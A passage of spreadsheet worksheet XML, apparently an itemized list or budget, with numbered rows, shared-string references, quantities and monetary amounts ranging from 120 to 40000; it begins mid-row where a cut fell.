      <c r="L204" s="25"/>
      <c r="M204" s="25"/>
      <c r="N204" s="47"/>
      <c r="O204" s="47"/>
      <c r="P204" s="47"/>
      <c r="Q204" s="47"/>
      <c r="R204" s="47"/>
      <c r="S204" s="47"/>
      <c r="T204" s="47"/>
      <c r="U204" s="47"/>
      <c r="V204" s="47"/>
      <c r="W204" s="47"/>
      <c r="X204" s="47"/>
      <c r="Y204" s="47"/>
      <c r="Z204" s="47"/>
      <c r="AA204" s="47"/>
      <c r="AB204" s="47"/>
      <c r="AC204" s="47"/>
      <c r="AD204" s="47"/>
      <c r="AE204" s="47"/>
      <c r="AF204" s="47"/>
      <c r="AG204" s="47"/>
    </row>
    <row r="205" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A205" s="25"/>
      <c r="B205" s="36">
        <v>331</v>
      </c>
      <c r="C205" s="36"/>
      <c r="D205" s="63" t="s">
        <v>3683</v>
      </c>
      <c r="E205" s="63" t="s">
        <v>4491</v>
      </c>
      <c r="F205" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G205" s="26">
        <v>1</v>
      </c>
      <c r="H205" s="26"/>
      <c r="I205" s="75"/>
      <c r="J205" s="50">
        <v>1200</v>
      </c>
      <c r="L205" s="25"/>
      <c r="M205" s="25"/>
      <c r="N205" s="47"/>
      <c r="O205" s="47"/>
      <c r="P205" s="47"/>
      <c r="Q205" s="47"/>
      <c r="R205" s="47"/>
      <c r="S205" s="47"/>
      <c r="T205" s="47"/>
      <c r="U205" s="47"/>
      <c r="V205" s="47"/>
      <c r="W205" s="47"/>
      <c r="X205" s="47"/>
      <c r="Y205" s="47"/>
      <c r="Z205" s="47"/>
      <c r="AA205" s="47"/>
      <c r="AB205" s="47"/>
      <c r="AC205" s="47"/>
      <c r="AD205" s="47"/>
      <c r="AE205" s="47"/>
      <c r="AF205" s="47"/>
      <c r="AG205" s="47"/>
    </row>
    <row r="206" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A206" s="25"/>
      <c r="B206" s="36">
        <v>332</v>
      </c>
      <c r="C206" s="36"/>
      <c r="D206" s="63" t="s">
        <v>4553</v>
      </c>
      <c r="E206" s="63" t="s">
        <v>4485</v>
      </c>
      <c r="F206" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G206" s="26">
        <v>1</v>
      </c>
      <c r="H206" s="26"/>
      <c r="I206" s="75"/>
      <c r="J206" s="50">
        <v>2400</v>
      </c>
      <c r="L206" s="25"/>
      <c r="M206" s="25"/>
      <c r="N206" s="47"/>
      <c r="O206" s="47"/>
      <c r="P206" s="47"/>
      <c r="Q206" s="47"/>
      <c r="R206" s="47"/>
      <c r="S206" s="47"/>
      <c r="T206" s="47"/>
      <c r="U206" s="47"/>
      <c r="V206" s="47"/>
      <c r="W206" s="47"/>
      <c r="X206" s="47"/>
      <c r="Y206" s="47"/>
      <c r="Z206" s="47"/>
      <c r="AA206" s="47"/>
      <c r="AB206" s="47"/>
      <c r="AC206" s="47"/>
      <c r="AD206" s="47"/>
      <c r="AE206" s="47"/>
      <c r="AF206" s="47"/>
      <c r="AG206" s="47"/>
    </row>
    <row r="207" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A207" s="25"/>
      <c r="B207" s="36">
        <v>333</v>
      </c>
      <c r="C207" s="36"/>
      <c r="D207" s="63" t="s">
        <v>4554</v>
      </c>
      <c r="E207" s="63" t="s">
        <v>4555</v>
      </c>
      <c r="F207" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G207" s="26">
        <v>1</v>
      </c>
      <c r="H207" s="26"/>
      <c r="I207" s="26"/>
      <c r="J207" s="50">
        <v>1000</v>
      </c>
      <c r="L207" s="25"/>
      <c r="M207" s="25"/>
      <c r="N207" s="47"/>
      <c r="O207" s="47"/>
      <c r="P207" s="47"/>
      <c r="Q207" s="47"/>
      <c r="R207" s="47"/>
      <c r="S207" s="47"/>
      <c r="T207" s="47"/>
      <c r="U207" s="47"/>
      <c r="V207" s="47"/>
      <c r="W207" s="47"/>
      <c r="X207" s="47"/>
      <c r="Y207" s="47"/>
      <c r="Z207" s="47"/>
      <c r="AA207" s="47"/>
      <c r="AB207" s="47"/>
      <c r="AC207" s="47"/>
      <c r="AD207" s="47"/>
      <c r="AE207" s="47"/>
      <c r="AF207" s="47"/>
      <c r="AG207" s="47"/>
    </row>
    <row r="208" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A208" s="25"/>
      <c r="B208" s="36">
        <v>334</v>
      </c>
      <c r="C208" s="36"/>
      <c r="D208" s="63" t="s">
        <v>4474</v>
      </c>
      <c r="E208" s="63"/>
      <c r="F208" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G208" s="26">
        <v>1</v>
      </c>
      <c r="H208" s="26"/>
      <c r="I208" s="26"/>
      <c r="J208" s="50">
        <v>4000</v>
      </c>
      <c r="L208" s="25"/>
      <c r="M208" s="25"/>
      <c r="N208" s="47"/>
      <c r="O208" s="47"/>
      <c r="P208" s="47"/>
      <c r="Q208" s="47"/>
      <c r="R208" s="47"/>
      <c r="S208" s="47"/>
      <c r="T208" s="47"/>
      <c r="U208" s="47"/>
      <c r="V208" s="47"/>
      <c r="W208" s="47"/>
      <c r="X208" s="47"/>
      <c r="Y208" s="47"/>
      <c r="Z208" s="47"/>
      <c r="AA208" s="47"/>
      <c r="AB208" s="47"/>
      <c r="AC208" s="47"/>
      <c r="AD208" s="47"/>
      <c r="AE208" s="47"/>
      <c r="AF208" s="47"/>
      <c r="AG208" s="47"/>
    </row>
    <row r="209" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A209" s="25"/>
      <c r="B209" s="36">
        <v>335</v>
      </c>
      <c r="C209" s="36"/>
      <c r="D209" s="63" t="s">
        <v>4249</v>
      </c>
      <c r="E209" s="63" t="s">
        <v>4556</v>
      </c>
      <c r="F209" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G209" s="26">
        <v>1</v>
      </c>
      <c r="H209" s="26"/>
      <c r="I209" s="26"/>
      <c r="J209" s="50">
        <v>2000</v>
      </c>
      <c r="L209" s="25"/>
      <c r="M209" s="25"/>
      <c r="N209" s="47"/>
      <c r="O209" s="47"/>
      <c r="P209" s="47"/>
      <c r="Q209" s="47"/>
      <c r="R209" s="47"/>
      <c r="S209" s="47"/>
      <c r="T209" s="47"/>
      <c r="U209" s="47"/>
      <c r="V209" s="47"/>
      <c r="W209" s="47"/>
      <c r="X209" s="47"/>
      <c r="Y209" s="47"/>
      <c r="Z209" s="47"/>
      <c r="AA209" s="47"/>
      <c r="AB209" s="47"/>
      <c r="AC209" s="47"/>
      <c r="AD209" s="47"/>
      <c r="AE209" s="47"/>
      <c r="AF209" s="47"/>
      <c r="AG209" s="47"/>
    </row>
    <row r="210" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A210" s="25"/>
      <c r="B210" s="36">
        <v>336</v>
      </c>
      <c r="C210" s="36"/>
      <c r="D210" s="63" t="s">
        <v>4557</v>
      </c>
      <c r="E210" s="63" t="s">
        <v>4541</v>
      </c>
      <c r="F210" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G210" s="26">
        <v>1</v>
      </c>
      <c r="H210" s="26"/>
      <c r="I210" s="26"/>
      <c r="J210" s="50">
        <v>2000</v>
      </c>
      <c r="L210" s="25"/>
      <c r="M210" s="25"/>
      <c r="N210" s="47"/>
      <c r="O210" s="47"/>
      <c r="P210" s="47"/>
      <c r="Q210" s="47"/>
      <c r="R210" s="47"/>
      <c r="S210" s="47"/>
      <c r="T210" s="47"/>
      <c r="U210" s="47"/>
      <c r="V210" s="47"/>
      <c r="W210" s="47"/>
      <c r="X210" s="47"/>
      <c r="Y210" s="47"/>
      <c r="Z210" s="47"/>
      <c r="AA210" s="47"/>
      <c r="AB210" s="47"/>
      <c r="AC210" s="47"/>
      <c r="AD210" s="47"/>
      <c r="AE210" s="47"/>
      <c r="AF210" s="47"/>
      <c r="AG210" s="47"/>
    </row>
    <row r="211" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A211" s="25"/>
      <c r="B211" s="36">
        <v>337</v>
      </c>
      <c r="C211" s="36"/>
      <c r="D211" s="63" t="s">
        <v>4482</v>
      </c>
      <c r="E211" s="63" t="s">
        <v>4558</v>
      </c>
      <c r="F211" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G211" s="26">
        <v>1</v>
      </c>
      <c r="H211" s="26"/>
      <c r="I211" s="26"/>
      <c r="J211" s="50">
        <v>1000</v>
      </c>
      <c r="L211" s="25"/>
      <c r="M211" s="25"/>
      <c r="N211" s="47"/>
      <c r="O211" s="47"/>
      <c r="P211" s="47"/>
      <c r="Q211" s="47"/>
      <c r="R211" s="47"/>
      <c r="S211" s="47"/>
      <c r="T211" s="47"/>
      <c r="U211" s="47"/>
      <c r="V211" s="47"/>
      <c r="W211" s="47"/>
      <c r="X211" s="47"/>
      <c r="Y211" s="47"/>
      <c r="Z211" s="47"/>
      <c r="AA211" s="47"/>
      <c r="AB211" s="47"/>
      <c r="AC211" s="47"/>
      <c r="AD211" s="47"/>
      <c r="AE211" s="47"/>
      <c r="AF211" s="47"/>
      <c r="AG211" s="47"/>
    </row>
    <row r="212" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A212" s="25"/>
      <c r="B212" s="36">
        <v>338</v>
      </c>
      <c r="C212" s="36"/>
      <c r="D212" s="63" t="s">
        <v>4559</v>
      </c>
      <c r="E212" s="63"/>
      <c r="F212" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G212" s="26">
        <v>1</v>
      </c>
      <c r="H212" s="26"/>
      <c r="I212" s="26"/>
      <c r="J212" s="50">
        <v>40000</v>
      </c>
      <c r="K212" s="26"/>
      <c r="L212" s="25"/>
      <c r="M212" s="25"/>
      <c r="N212" s="47"/>
      <c r="O212" s="47"/>
      <c r="P212" s="47"/>
      <c r="Q212" s="47"/>
      <c r="R212" s="47"/>
      <c r="S212" s="47"/>
      <c r="T212" s="47"/>
      <c r="U212" s="47"/>
      <c r="V212" s="47"/>
      <c r="W212" s="47"/>
      <c r="X212" s="47"/>
      <c r="Y212" s="47"/>
      <c r="Z212" s="47"/>
      <c r="AA212" s="47"/>
      <c r="AB212" s="47"/>
      <c r="AC212" s="47"/>
      <c r="AD212" s="47"/>
      <c r="AE212" s="47"/>
      <c r="AF212" s="47"/>
      <c r="AG212" s="47"/>
    </row>
    <row r="213" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A213" s="25"/>
      <c r="B213" s="36">
        <v>340</v>
      </c>
      <c r="C213" s="36"/>
      <c r="D213" s="63" t="s">
        <v>4560</v>
      </c>
      <c r="E213" s="63"/>
      <c r="F213" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G213" s="26">
        <v>1</v>
      </c>
      <c r="H213" s="26"/>
      <c r="I213" s="26"/>
      <c r="J213" s="50">
        <v>1600</v>
      </c>
      <c r="K213" s="26"/>
      <c r="L213" s="25"/>
      <c r="M213" s="25"/>
      <c r="N213" s="47"/>
      <c r="O213" s="47"/>
      <c r="P213" s="47"/>
      <c r="Q213" s="47"/>
      <c r="R213" s="47"/>
      <c r="S213" s="47"/>
      <c r="T213" s="47"/>
      <c r="U213" s="47"/>
      <c r="V213" s="47"/>
      <c r="W213" s="47"/>
      <c r="X213" s="47"/>
      <c r="Y213" s="47"/>
      <c r="Z213" s="47"/>
      <c r="AA213" s="47"/>
      <c r="AB213" s="47"/>
      <c r="AC213" s="47"/>
      <c r="AD213" s="47"/>
      <c r="AE213" s="47"/>
      <c r="AF213" s="47"/>
      <c r="AG213" s="47"/>
    </row>
    <row r="214" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A214" s="25"/>
      <c r="B214" s="36">
        <v>341</v>
      </c>
      <c r="C214" s="36"/>
      <c r="D214" s="63" t="s">
        <v>4561</v>
      </c>
      <c r="E214" s="63">
        <v>600</v>
      </c>
      <c r="F214" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G214" s="26">
        <v>1</v>
      </c>
      <c r="H214" s="26"/>
      <c r="I214" s="26"/>
      <c r="J214" s="50">
        <v>1600</v>
      </c>
      <c r="K214" s="26"/>
      <c r="L214" s="25"/>
      <c r="M214" s="25"/>
      <c r="N214" s="47"/>
      <c r="O214" s="47"/>
      <c r="P214" s="47"/>
      <c r="Q214" s="47"/>
      <c r="R214" s="47"/>
      <c r="S214" s="47"/>
      <c r="T214" s="47"/>
      <c r="U214" s="47"/>
      <c r="V214" s="47"/>
      <c r="W214" s="47"/>
      <c r="X214" s="47"/>
      <c r="Y214" s="47"/>
      <c r="Z214" s="47"/>
      <c r="AA214" s="47"/>
      <c r="AB214" s="47"/>
      <c r="AC214" s="47"/>
      <c r="AD214" s="47"/>
      <c r="AE214" s="47"/>
      <c r="AF214" s="47"/>
      <c r="AG214" s="47"/>
    </row>
    <row r="215" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A215" s="25"/>
      <c r="B215" s="36">
        <v>343</v>
      </c>
      <c r="C215" s="36"/>
      <c r="D215" s="63" t="s">
        <v>4562</v>
      </c>
      <c r="E215" s="63" t="s">
        <v>4563</v>
      </c>
      <c r="F215" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G215" s="26">
        <v>1</v>
      </c>
      <c r="H215" s="26"/>
      <c r="I215" s="75"/>
      <c r="J215" s="50">
        <v>6000</v>
      </c>
      <c r="L215" s="25"/>
      <c r="M215" s="25"/>
      <c r="N215" s="47"/>
      <c r="O215" s="47"/>
      <c r="P215" s="47"/>
      <c r="Q215" s="47"/>
      <c r="R215" s="47"/>
      <c r="S215" s="47"/>
      <c r="T215" s="47"/>
      <c r="U215" s="47"/>
      <c r="V215" s="47"/>
      <c r="W215" s="47"/>
      <c r="X215" s="47"/>
      <c r="Y215" s="47"/>
      <c r="Z215" s="47"/>
      <c r="AA215" s="47"/>
      <c r="AB215" s="47"/>
      <c r="AC215" s="47"/>
      <c r="AD215" s="47"/>
      <c r="AE215" s="47"/>
      <c r="AF215" s="47"/>
      <c r="AG215" s="47"/>
    </row>
    <row r="216" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A216" s="25"/>
      <c r="B216" s="74" t="s">
        <v>4564</v>
      </c>
      <c r="C216" s="74"/>
      <c r="D216" s="74"/>
      <c r="E216" s="74"/>
      <c r="F216" s="36"/>
      <c r="G216" s="26"/>
      <c r="H216" s="26"/>
      <c r="I216" s="75"/>
      <c r="J216" s="50">
        <v>0</v>
      </c>
      <c r="L216" s="25"/>
      <c r="M216" s="25"/>
      <c r="N216" s="47"/>
      <c r="O216" s="47"/>
      <c r="P216" s="47"/>
      <c r="Q216" s="47"/>
      <c r="R216" s="47"/>
      <c r="S216" s="47"/>
      <c r="T216" s="47"/>
      <c r="U216" s="47"/>
      <c r="V216" s="47"/>
      <c r="W216" s="47"/>
      <c r="X216" s="47"/>
      <c r="Y216" s="47"/>
      <c r="Z216" s="47"/>
      <c r="AA216" s="47"/>
      <c r="AB216" s="47"/>
      <c r="AC216" s="47"/>
      <c r="AD216" s="47"/>
      <c r="AE216" s="47"/>
      <c r="AF216" s="47"/>
      <c r="AG216" s="47"/>
    </row>
    <row r="217" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A217" s="25"/>
      <c r="B217" s="36">
        <v>344</v>
      </c>
      <c r="C217" s="36"/>
      <c r="D217" s="63" t="s">
        <v>2430</v>
      </c>
      <c r="E217" s="63" t="s">
        <v>4503</v>
      </c>
      <c r="F217" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G217" s="26">
        <v>1</v>
      </c>
      <c r="H217" s="26"/>
      <c r="I217" s="26"/>
      <c r="J217" s="50">
        <v>10000</v>
      </c>
      <c r="L217" s="25"/>
      <c r="M217" s="25"/>
      <c r="N217" s="47"/>
      <c r="O217" s="47"/>
      <c r="P217" s="47"/>
      <c r="Q217" s="47"/>
      <c r="R217" s="47"/>
      <c r="S217" s="47"/>
      <c r="T217" s="47"/>
      <c r="U217" s="47"/>
      <c r="V217" s="47"/>
      <c r="W217" s="47"/>
      <c r="X217" s="47"/>
      <c r="Y217" s="47"/>
      <c r="Z217" s="47"/>
      <c r="AA217" s="47"/>
      <c r="AB217" s="47"/>
      <c r="AC217" s="47"/>
      <c r="AD217" s="47"/>
      <c r="AE217" s="47"/>
      <c r="AF217" s="47"/>
      <c r="AG217" s="47"/>
    </row>
    <row r="218" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A218" s="25"/>
      <c r="B218" s="36">
        <v>345</v>
      </c>
      <c r="C218" s="36"/>
      <c r="D218" s="63" t="s">
        <v>4565</v>
      </c>
      <c r="E218" s="63" t="s">
        <v>4512</v>
      </c>
      <c r="F218" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G218" s="26">
        <v>1</v>
      </c>
      <c r="H218" s="26"/>
      <c r="I218" s="26"/>
      <c r="J218" s="50">
        <v>6000</v>
      </c>
      <c r="L218" s="25"/>
      <c r="M218" s="25"/>
      <c r="N218" s="47"/>
      <c r="O218" s="47"/>
      <c r="P218" s="47"/>
      <c r="Q218" s="47"/>
      <c r="R218" s="47"/>
      <c r="S218" s="47"/>
      <c r="T218" s="47"/>
      <c r="U218" s="47"/>
      <c r="V218" s="47"/>
      <c r="W218" s="47"/>
      <c r="X218" s="47"/>
      <c r="Y218" s="47"/>
      <c r="Z218" s="47"/>
      <c r="AA218" s="47"/>
      <c r="AB218" s="47"/>
      <c r="AC218" s="47"/>
      <c r="AD218" s="47"/>
      <c r="AE218" s="47"/>
      <c r="AF218" s="47"/>
      <c r="AG218" s="47"/>
    </row>
    <row r="219" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A219" s="25"/>
      <c r="B219" s="36">
        <v>346</v>
      </c>
      <c r="C219" s="36"/>
      <c r="D219" s="63" t="s">
        <v>4566</v>
      </c>
      <c r="E219" s="63" t="s">
        <v>4567</v>
      </c>
      <c r="F219" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G219" s="26">
        <v>1</v>
      </c>
      <c r="H219" s="26"/>
      <c r="I219" s="26"/>
      <c r="J219" s="50">
        <v>1600</v>
      </c>
      <c r="L219" s="25"/>
      <c r="M219" s="25"/>
      <c r="N219" s="47"/>
      <c r="O219" s="47"/>
      <c r="P219" s="47"/>
      <c r="Q219" s="47"/>
      <c r="R219" s="47"/>
      <c r="S219" s="47"/>
      <c r="T219" s="47"/>
      <c r="U219" s="47"/>
      <c r="V219" s="47"/>
      <c r="W219" s="47"/>
      <c r="X219" s="47"/>
      <c r="Y219" s="47"/>
      <c r="Z219" s="47"/>
      <c r="AA219" s="47"/>
      <c r="AB219" s="47"/>
      <c r="AC219" s="47"/>
      <c r="AD219" s="47"/>
      <c r="AE219" s="47"/>
      <c r="AF219" s="47"/>
      <c r="AG219" s="47"/>
    </row>
    <row r="220" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A220" s="25"/>
      <c r="B220" s="36">
        <v>347</v>
      </c>
      <c r="C220" s="36"/>
      <c r="D220" s="63" t="s">
        <v>4280</v>
      </c>
      <c r="E220" s="63" t="s">
        <v>4568</v>
      </c>
      <c r="F220" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G220" s="26">
        <v>1</v>
      </c>
      <c r="H220" s="26"/>
      <c r="I220" s="26"/>
      <c r="J220" s="50">
        <v>10000</v>
      </c>
      <c r="L220" s="25"/>
      <c r="M220" s="25"/>
      <c r="N220" s="47"/>
      <c r="O220" s="47"/>
      <c r="P220" s="47"/>
      <c r="Q220" s="47"/>
      <c r="R220" s="47"/>
      <c r="S220" s="47"/>
      <c r="T220" s="47"/>
      <c r="U220" s="47"/>
      <c r="V220" s="47"/>
      <c r="W220" s="47"/>
      <c r="X220" s="47"/>
      <c r="Y220" s="47"/>
      <c r="Z220" s="47"/>
      <c r="AA220" s="47"/>
      <c r="AB220" s="47"/>
      <c r="AC220" s="47"/>
      <c r="AD220" s="47"/>
      <c r="AE220" s="47"/>
      <c r="AF220" s="47"/>
      <c r="AG220" s="47"/>
    </row>
    <row r="221" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A221" s="25"/>
      <c r="B221" s="36">
        <v>348</v>
      </c>
      <c r="C221" s="36"/>
      <c r="D221" s="63" t="s">
        <v>4569</v>
      </c>
      <c r="E221" s="63" t="s">
        <v>4570</v>
      </c>
      <c r="F221" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G221" s="26">
        <v>1</v>
      </c>
      <c r="H221" s="26"/>
      <c r="I221" s="26"/>
      <c r="J221" s="50">
        <v>10000</v>
      </c>
      <c r="L221" s="25"/>
      <c r="M221" s="25"/>
      <c r="N221" s="47"/>
      <c r="O221" s="47"/>
      <c r="P221" s="47"/>
      <c r="Q221" s="47"/>
      <c r="R221" s="47"/>
      <c r="S221" s="47"/>
      <c r="T221" s="47"/>
      <c r="U221" s="47"/>
      <c r="V221" s="47"/>
      <c r="W221" s="47"/>
      <c r="X221" s="47"/>
      <c r="Y221" s="47"/>
      <c r="Z221" s="47"/>
      <c r="AA221" s="47"/>
      <c r="AB221" s="47"/>
      <c r="AC221" s="47"/>
      <c r="AD221" s="47"/>
      <c r="AE221" s="47"/>
      <c r="AF221" s="47"/>
      <c r="AG221" s="47"/>
    </row>
    <row r="222" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A222" s="25"/>
      <c r="B222" s="36">
        <v>349</v>
      </c>
      <c r="C222" s="36"/>
      <c r="D222" s="63" t="s">
        <v>4571</v>
      </c>
      <c r="E222" s="63" t="s">
        <v>4572</v>
      </c>
      <c r="F222" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G222" s="26">
        <v>1</v>
      </c>
      <c r="H222" s="26"/>
      <c r="I222" s="26"/>
      <c r="J222" s="50">
        <v>1120</v>
      </c>
      <c r="K222" s="26"/>
      <c r="L222" s="25"/>
      <c r="M222" s="25"/>
      <c r="N222" s="47"/>
      <c r="O222" s="47"/>
      <c r="P222" s="47"/>
      <c r="Q222" s="47"/>
      <c r="R222" s="47"/>
      <c r="S222" s="47"/>
      <c r="T222" s="47"/>
      <c r="U222" s="47"/>
      <c r="V222" s="47"/>
      <c r="W222" s="47"/>
      <c r="X222" s="47"/>
      <c r="Y222" s="47"/>
      <c r="Z222" s="47"/>
      <c r="AA222" s="47"/>
      <c r="AB222" s="47"/>
      <c r="AC222" s="47"/>
      <c r="AD222" s="47"/>
      <c r="AE222" s="47"/>
      <c r="AF222" s="47"/>
      <c r="AG222" s="47"/>
    </row>
    <row r="223" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A223" s="25"/>
      <c r="B223" s="36">
        <v>350</v>
      </c>
      <c r="C223" s="36"/>
      <c r="D223" s="63" t="s">
        <v>4166</v>
      </c>
      <c r="E223" s="63" t="s">
        <v>2528</v>
      </c>
      <c r="F223" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G223" s="26">
        <v>1</v>
      </c>
      <c r="H223" s="26"/>
      <c r="I223" s="26"/>
      <c r="J223" s="50">
        <v>800</v>
      </c>
      <c r="K223" s="26"/>
      <c r="L223" s="25"/>
      <c r="M223" s="25"/>
      <c r="N223" s="47"/>
      <c r="O223" s="47"/>
      <c r="P223" s="47"/>
      <c r="Q223" s="47"/>
      <c r="R223" s="47"/>
      <c r="S223" s="47"/>
      <c r="T223" s="47"/>
      <c r="U223" s="47"/>
      <c r="V223" s="47"/>
      <c r="W223" s="47"/>
      <c r="X223" s="47"/>
      <c r="Y223" s="47"/>
      <c r="Z223" s="47"/>
      <c r="AA223" s="47"/>
      <c r="AB223" s="47"/>
      <c r="AC223" s="47"/>
      <c r="AD223" s="47"/>
      <c r="AE223" s="47"/>
      <c r="AF223" s="47"/>
      <c r="AG223" s="47"/>
    </row>
    <row r="224" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A224" s="25"/>
      <c r="B224" s="74" t="s">
        <v>1858</v>
      </c>
      <c r="C224" s="74"/>
      <c r="D224" s="74"/>
      <c r="E224" s="74"/>
      <c r="F224" s="36"/>
      <c r="H224" s="36"/>
      <c r="I224" s="76"/>
      <c r="J224" s="50">
        <v>0</v>
      </c>
      <c r="K224" s="26"/>
      <c r="L224" s="25"/>
      <c r="M224" s="25"/>
      <c r="N224" s="47"/>
      <c r="O224" s="47"/>
      <c r="P224" s="47"/>
      <c r="Q224" s="47"/>
      <c r="R224" s="47"/>
      <c r="S224" s="47"/>
      <c r="T224" s="47"/>
      <c r="U224" s="47"/>
      <c r="V224" s="47"/>
      <c r="W224" s="47"/>
      <c r="X224" s="47"/>
      <c r="Y224" s="47"/>
      <c r="Z224" s="47"/>
      <c r="AA224" s="47"/>
      <c r="AB224" s="47"/>
      <c r="AC224" s="47"/>
      <c r="AD224" s="47"/>
      <c r="AE224" s="47"/>
      <c r="AF224" s="47"/>
      <c r="AG224" s="47"/>
    </row>
    <row r="225" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A225" s="25"/>
      <c r="B225" s="36">
        <v>351</v>
      </c>
      <c r="C225" s="36"/>
      <c r="D225" s="63" t="s">
        <v>4573</v>
      </c>
      <c r="E225" s="63"/>
      <c r="F225" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G225" s="26">
        <v>1</v>
      </c>
      <c r="H225" s="26"/>
      <c r="I225" s="75"/>
      <c r="J225" s="50">
        <v>2000</v>
      </c>
      <c r="L225" s="25"/>
      <c r="M225" s="25"/>
      <c r="N225" s="47"/>
      <c r="O225" s="47"/>
      <c r="P225" s="47"/>
      <c r="Q225" s="47"/>
      <c r="R225" s="47"/>
      <c r="S225" s="47"/>
      <c r="T225" s="47"/>
      <c r="U225" s="47"/>
      <c r="V225" s="47"/>
      <c r="W225" s="47"/>
      <c r="X225" s="47"/>
      <c r="Y225" s="47"/>
      <c r="Z225" s="47"/>
      <c r="AA225" s="47"/>
      <c r="AB225" s="47"/>
      <c r="AC225" s="47"/>
      <c r="AD225" s="47"/>
      <c r="AE225" s="47"/>
      <c r="AF225" s="47"/>
      <c r="AG225" s="47"/>
    </row>
    <row r="226" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A226" s="25"/>
      <c r="B226" s="36">
        <v>352</v>
      </c>
      <c r="C226" s="36"/>
      <c r="D226" s="63" t="s">
        <v>4574</v>
      </c>
      <c r="E226" s="63" t="s">
        <v>4575</v>
      </c>
      <c r="F226" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G226" s="26">
        <v>1</v>
      </c>
      <c r="H226" s="26"/>
      <c r="I226" s="75"/>
      <c r="J226" s="50">
        <v>12000</v>
      </c>
      <c r="L226" s="25"/>
      <c r="M226" s="25"/>
      <c r="N226" s="47"/>
      <c r="O226" s="47"/>
      <c r="P226" s="47"/>
      <c r="Q226" s="47"/>
      <c r="R226" s="47"/>
      <c r="S226" s="47"/>
      <c r="T226" s="47"/>
      <c r="U226" s="47"/>
      <c r="V226" s="47"/>
      <c r="W226" s="47"/>
      <c r="X226" s="47"/>
      <c r="Y226" s="47"/>
      <c r="Z226" s="47"/>
      <c r="AA226" s="47"/>
      <c r="AB226" s="47"/>
      <c r="AC226" s="47"/>
      <c r="AD226" s="47"/>
      <c r="AE226" s="47"/>
      <c r="AF226" s="47"/>
      <c r="AG226" s="47"/>
    </row>
    <row r="227" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A227" s="25"/>
      <c r="B227" s="36">
        <v>353</v>
      </c>
      <c r="C227" s="36"/>
      <c r="D227" s="63" t="s">
        <v>4576</v>
      </c>
      <c r="E227" s="63" t="s">
        <v>4577</v>
      </c>
      <c r="F227" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G227" s="26">
        <v>1</v>
      </c>
      <c r="H227" s="26"/>
      <c r="I227" s="75"/>
      <c r="J227" s="50">
        <v>120</v>
      </c>
      <c r="L227" s="25"/>
      <c r="M227" s="25"/>
      <c r="N227" s="47"/>
      <c r="O227" s="47"/>
      <c r="P227" s="47"/>
      <c r="Q227" s="47"/>
      <c r="R227" s="47"/>
      <c r="S227" s="47"/>
      <c r="T227" s="47"/>
      <c r="U227" s="47"/>
      <c r="V227" s="47"/>
      <c r="W227" s="47"/>
      <c r="X227" s="47"/>
      <c r="Y227" s="47"/>
      <c r="Z227" s="47"/>
      <c r="AA227" s="47"/>
      <c r="AB227" s="47"/>
      <c r="AC227" s="47"/>
      <c r="AD227" s="47"/>
      <c r="AE227" s="47"/>
      <c r="AF227" s="47"/>
      <c r="AG227" s="47"/>
    </row>
    <row r="228" s="23" customFormat="1" customHeight="1" spans="1:33">
      <c r="A228" s="25"/>
      <c r="B228" s="36">
        <v>354</v>
      </c>
      <c r="C228" s="36"/>
      <c r="D228" s="63" t="s">
        <v>532</v>
      </c>
      <c r="E228" s="63" t="s">
        <v>4555</v>
      </c>
      <c r="F228" s="36" t="s">
        <v>223</v>
      </c>
      <c r="G228" s="26">
        <v>1</v>
      </c>
      <c r="H228" s="26"/>
      <c r="I228" s="26"/>
      <c r="J228" s="50">
        <v>320</v>
      </c>
      <c r="L228" s="25"/>
      <c r="M228" s="25"/>
      <c r="N228" s="47"/>
      <c r="O228" s="47"/>
      <c r="P228" s="47"/>
      <c r="Q228" s="47"/>
      <c r="R228" s="47"/>
      <c r="S228" s="47"/>
      <c r="T228" s="47"/>
      <c r="U228" s="47"/>
      <c r="V228" s="47"/>
      <c r="W228" s="47"/>
      <c r="X228" s="47"/>
      <c r="Y228" s="47"/>
      <c r="Z228" s="47"/>
      <c r="AA228" s="47"/>
      <c r="AB228" s="47"/>
      <c r="AC228" s="47"/>
      <c r="AD228" s="47"/>
      <c r="AE228" s="47"/>
      <c r="AF228" s="47"/>
      <c r="AG228" s="47"/>
    </row>
